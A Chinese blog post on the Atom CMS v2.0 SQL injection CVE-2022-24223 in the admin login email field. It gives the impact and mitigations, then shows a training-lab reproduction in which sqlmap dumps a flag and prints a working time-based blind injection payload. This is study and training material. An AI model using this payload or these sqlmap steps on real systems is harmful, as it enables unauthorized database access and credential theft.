Atom CMS v2.0 SQL 注入(CVE-2022-24223)

本文涉及的产品
RDS MySQL Serverless 基础系列,0.5-2RCU 50GB
云数据库 RDS MySQL,集群系列 2核4GB
推荐场景:
搭建个人博客
云数据库 RDS MySQL,高可用系列 2核4GB
简介: Atom CMS v2.0 SQL 注入(CVE-2022-24223)

前言

概要 CVE-2022-24223 是一个发现于 Atom CMS v2.0 中的 SQL 注入。该存在于 /admin/login.php 文件中,通过该文件,可以在未经身份验证的情况下执行任意的 SQL 命令。

描述 该位于 Atom CMS 的管理员登录页面(/admin/login.php),其中电子邮件字段的用户输入未经过适当的过滤和清理便直接用于 SQL 查询。攻击者可以通过操纵登录表单中的输入字段来注入恶意的 SQL 代码,从而绕过身份验证,访问数据库中的敏感信息,甚至执行管理员操作而不需要合法凭证 (OpenCVE) (TrackCVE)。

影响 成功利用该的可以:

  1. 绕过身份验证,访问 CMS 的管理功能。
  2. 获取数据库中的敏感信息,例如用户凭证和个人信息。
  3. 对整个 Web 应用程序进行控制,进一步发起针对网站用户或底层服务器基础设施的(Feedly) (Security For Everyone)。

评分 根据 CVSS v3.1 标准,该的评分为 9.8(严重级别),在 CVSS v2 标准下评分为 7.5(高危级别) (TrackCVE)。

防护措施 为了防止此类 SQL 注入,建议开发者:

  1. 实施严格的输入验证和清理。
  2. 使用参数化查询来避免直接在 SQL 查询中使用用户输入的数据。
  3. 定期进行安全审计和扫描,以确保及时发现和修复潜在的安全问题。

春秋云镜是一个专注于网络安全培训和实战演练的平台,旨在通过模拟真实的网络环境和场景,提升用户的网络安全防护能力和实战技能。这个平台主要提供以下功能和特点:


实战演练:


提供各种网络安全攻防演练场景,模拟真实的网络事件,帮助用户在实际操作中掌握网络安全技术。

场景涵盖Web安全、系统安全、网络安全、社工等多个领域。


复现:


用户可以通过平台对已知的安全进行复现,了解的产生原因、利用方法和修复措施。

通过实战操作,帮助用户掌握利用和防护的技能。


教学培训:


提供系统化的网络安全课程,从基础到高级,覆盖多个安全领域,适合不同水平的用户。

包含理论讲解和实战操作,帮助学员全面提升网络安全知识和实战能力。


竞赛与评测:


定期举办网络安全竞赛,如CTF(Capture The Flag)比赛,激发学员的学习兴趣和动力。提供个人和团队的安全能力评测,帮助学员了解自己的安全技能水平。


资源共享:


平台提供丰富的学习资源,包括教程、工具、案例分析等,方便用户随时查阅和学习。

用户可以在社区中分享经验和资源,互相交流和学习。


春秋云镜适合网络安全从业人员、学生以及对网络安全感兴趣的个人,通过在平台上进行不断的学习和实战演练,可以有效提升网络安全技能和防护能力。

介绍

Atom CMS v2.0

Atom CMS 是一个开源内容管理系统,专为简化网站建设和管理而设计。它具有以下主要特点:

主要特性

  1. 用户友好的界面
  • Atom CMS 提供一个直观的管理界面,使用户能够轻松地添加、编辑和管理网站内容。界面设计简洁,用户无需专业的技术知识即可上手。
  1. 模块化设计
  • 该 CMS 具有模块化的架构,允许用户根据需要安装和卸载不同的模块,从而扩展网站的功能。例如,可以添加新闻发布、博客、相册等模块。
  1. 模板系统
  • Atom CMS 支持自定义模板,使用户能够根据自己的需求设计和调整网站的外观和布局。模板系统灵活,支持各种前端框架和设计风格。
  1. 多用户管理
  • 系统允许多个用户同时管理网站,并且可以为不同的用户分配不同的角色和权限。这确保了网站的安全性和管理的便捷性。
  1. 内容版本控制
  • Atom CMS 具备内容版本控制功能,用户可以跟踪内容的修改历史,并在需要时恢复到以前的版本。这在内容管理和维护中非常有用。
  1. 多语言支持
  • 该 CMS 支持多语言功能,使用户能够创建和管理多语言网站,满足不同地区和语言用户的需求。
  1. 搜索引擎优化(SEO)
  • Atom CMS 提供了一系列内置的 SEO 工具,帮助用户优化网站在搜索引擎中的排名,提高网站的可见性和访问量。

应用场景

  • 企业网站:适合中小型企业创建企业网站,展示公司信息和服务。
  • 个人博客:个人用户可以使用 Atom CMS 创建和管理博客,分享个人观点和生活点滴。
  • 非营利组织网站:适合非营利组织创建信息门户,宣传组织的活动和项目。

社区和支持

Atom CMS 拥有一个活跃的开发者和用户社区,提供丰富的资源和支持。用户可以在论坛、邮件列表和社交媒体上找到帮助和建议。此外,官方还提供详细的文档和教程,帮助用户了解和使用系统的各项功能。


通过其强大的功能和灵活的设计,Atom CMS v2.0 是一个适用于各种网站建设需求的内容管理系统。用户可以根据自己的需求进行定制和扩展,轻松管理和维护网站内容。

复现

打开

进入是这样一个东西

这里不存点,点在 admin/login.php 中

随便输入数值登录

打开 BurpSuite 拦截数据包

复制数据包的值到 txt 文件中

这里跳过了前面爆库爆表环节,直接找 flag

┌──(root㉿kali)-[~]
└─# sqlmap -r sqlmap-post.txt -D "atomcms" -T "flag" --dump -v
        ___
       __H__
 ___ ___[.]_____ ___ ___  {1.8.4#stable}
|_ -| . [,]     | .'| . |
|___|_  [(]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
 
[*] starting @ 20:50:24 /2024-07-03/
 
[20:50:24] [INFO] parsing HTTP request from 'sqlmap-post.txt'
[20:50:24] [INFO] resuming back-end DBMS 'mysql' 
[20:50:24] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: email (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: email=123@123' AND (SELECT 1723 FROM (SELECT(SLEEP(5)))wLUx) AND 'BIkI'='BIkI&password=123
---
[20:50:24] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.12
[20:50:24] [INFO] fetching columns for table 'flag' in database 'atomcms'
[20:50:24] [WARNING] time-based comparison requires larger statistical model, please wait.............................. (done)     
[20:50:27] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions 
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] n
1
[20:50:45] [INFO] retrieved: flag
[20:51:48] [INFO] fetching entries for table 'flag' in database 'atomcms'
[20:51:48] [INFO] fetching number of entries for table 'flag' in database 'atomcms'
[20:51:48] [INFO] retrieved: 1
[20:51:54] [WARNING] (case) time-based comparison requires reset of statistical model, please wait.............................. (done)
flag{a5086810-1062-41c2-b1dd-b167d983a966}
Database: atomcms
Table: flag
[1 entry]
+--------------------------------------------+
| flag                                       |
+--------------------------------------------+
| flag{a5086810-1062-41c2-b1dd-b167d983a966} |
+--------------------------------------------+
 
[21:03:49] [INFO] table 'atomcms.flag' dumped to CSV file '/root/.local/share/sqlmap/output/eci-2zealxppdxmz7ojcz3y9.cloudeci1.ichunqiu.com/dump/atomcms/flag.csv'
[21:03:49] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/eci-2zealxppdxmz7ojcz3y9.cloudeci1.ichunqiu.com'
 
[*] ending @ 21:03:49 /2024-07-03/

相关实践学习
如何在云端创建MySQL数据库
开始实验后,系统会自动创建一台自建MySQL的 源数据库 ECS 实例和一台 目标数据库 RDS。
全面了解阿里云能为你做什么
阿里云在全球各地部署高效节能的绿色数据中心,利用清洁计算为万物互联的新世界提供源源不断的能源动力,目前开服的区域包括中国(华北、华东、华南、香港)、新加坡、美国(美东、美西)、欧洲、中东、澳大利亚、日本。目前阿里云的产品涵盖弹性计算、数据库、存储与CDN、分析与搜索、云通信、网络、管理与监控、应用服务、互联网中间件、移动服务、视频服务等。通过本课程,来了解阿里云能够为你的业务带来哪些帮助     相关的阿里云产品:云服务器ECS 云服务器 ECS(Elastic Compute Service)是一种弹性可伸缩的计算服务,助您降低 IT 成本,提升运维效率,使您更专注于核心业务创新。产品详情: https://www.aliyun.com/product/ecs
相关文章
|
3月前
|
SQL 安全 数据库
惊!Python Web安全黑洞大曝光:SQL注入、XSS、CSRF,你中招了吗?
在数字化时代,Web应用的安全性至关重要。许多Python开发者在追求功能时,常忽视SQL注入、XSS和CSRF等安全威胁。本文将深入剖析这些风险并提供最佳实践:使用参数化查询预防SQL注入;通过HTML转义阻止XSS攻击;在表单中加入CSRF令牌增强安全性。遵循这些方法,可有效提升Web应用的安全防护水平,保护用户数据与隐私。安全需持续关注与改进,每个细节都至关重要。
135 5
|
3月前
|
SQL 安全 数据库
深度揭秘:Python Web安全攻防战,SQL注入、XSS、CSRF一网打尽!
在Web开发领域,Python虽强大灵活,却也面临着SQL注入、XSS与CSRF等安全威胁。本文将剖析这些常见攻击手段,并提供示例代码,展示如何利用参数化查询、HTML转义及CSRF令牌等技术构建坚固防线,确保Python Web应用的安全性。安全之路永无止境,唯有不断改进方能应对挑战。
72 5
|
3月前
|
SQL 安全 数据安全/隐私保护
Python Web安全大挑战:面对SQL注入、XSS、CSRF,你准备好了吗?
在构建Python Web应用时,安全性至关重要。本文通过三个真实案例,探讨了如何防范SQL注入、XSS和CSRF攻击。首先,通过参数化查询替代字符串拼接,防止SQL注入;其次,利用HTML转义机制,避免XSS攻击;最后,采用CSRF令牌验证,保护用户免受CSRF攻击。这些策略能显著增强应用的安全性,帮助开发者应对复杂的网络威胁。安全是一个持续的过程,需不断学习新知识以抵御不断变化的威胁。
123 1
|
3月前
|
SQL 安全 数据库
Python Web开发者必看!SQL注入、XSS、CSRF全面解析,守护你的网站安全!
在Python Web开发中,构建安全应用至关重要。本文通过问答形式,详细解析了三种常见Web安全威胁——SQL注入、XSS和CSRF,并提供了实用的防御策略及示例代码。针对SQL注入,建议使用参数化查询;对于XSS,需对输出进行HTML编码;而防范CSRF,则应利用CSRF令牌。通过这些措施,帮助开发者有效提升应用安全性,确保网站稳定运行。
48 1
|
3月前
|
SQL 安全 数据库
深度揭秘:Python Web安全攻防战,SQL注入、XSS、CSRF一网打尽!
在Web开发领域,Python虽强大灵活,但安全挑战不容小觑。本文剖析Python Web应用中的三大安全威胁:SQL注入、XSS及CSRF,并提供防御策略。通过示例代码展示如何利用参数化查询、HTML转义与CSRF令牌构建安全防线,助您打造更安全的应用。安全是一场持久战,需不断改进优化。
52 3
|
3月前
|
SQL 安全 数据库
从入门到精通:Python Web安全守护指南,SQL注入、XSS、CSRF全防御!
【9月更文挑战第13天】在开发Python Web应用时,安全性至关重要。本文通过问答形式,详细介绍如何防范SQL注入、XSS及CSRF等常见威胁。通过使用参数化查询、HTML转义和CSRF令牌等技术,确保应用安全。附带示例代码,帮助读者从入门到精通Python Web安全。
93 6
|
3月前
|
SQL 安全 JavaScript
告别Web安全小白!Python实战指南:抵御SQL注入、XSS、CSRF的秘密武器!
【9月更文挑战第12天】在Web开发中,安全漏洞如同暗礁,尤其对初学者而言,SQL注入、跨站脚本(XSS)和跨站请求伪造(CSRF)是常见挑战。本文通过实战案例,展示如何利用Python应对这些威胁。首先,通过参数化查询防止SQL注入;其次,借助Jinja2模板引擎自动转义机制抵御XSS攻击;最后,使用Flask-WTF库生成和验证CSRF令牌,确保转账功能安全。掌握这些技巧,助你构建更安全的Web应用。
52 5
|
5月前
|
SQL 安全 数据库
深度揭秘:Python Web安全攻防战,SQL注入、XSS、CSRF一网打尽!
【7月更文挑战第27天】在 Web 开发中,Python 面临着如 SQL 注入、XSS 和 CSRF 等安全威胁。
71 0
|
5月前
|
SQL 安全 数据库
Python Web开发者必看!SQL注入、XSS、CSRF全面解析,守护你的网站安全!
【7月更文挑战第27天】在 Python Web 开发中, 安全至关重要。
71 0
|
5月前
|
SQL 安全 JavaScript
告别Web安全小白!Python实战指南:抵御SQL注入、XSS、CSRF的秘密武器!
【7月更文挑战第27天】在 Web 开发中,安全漏洞如同暗礁,其中 SQL 注入、XSS 和 CSRF 尤为棘手。本文通过实战案例展示如何使用 Python 抵御这些威胁。
65 0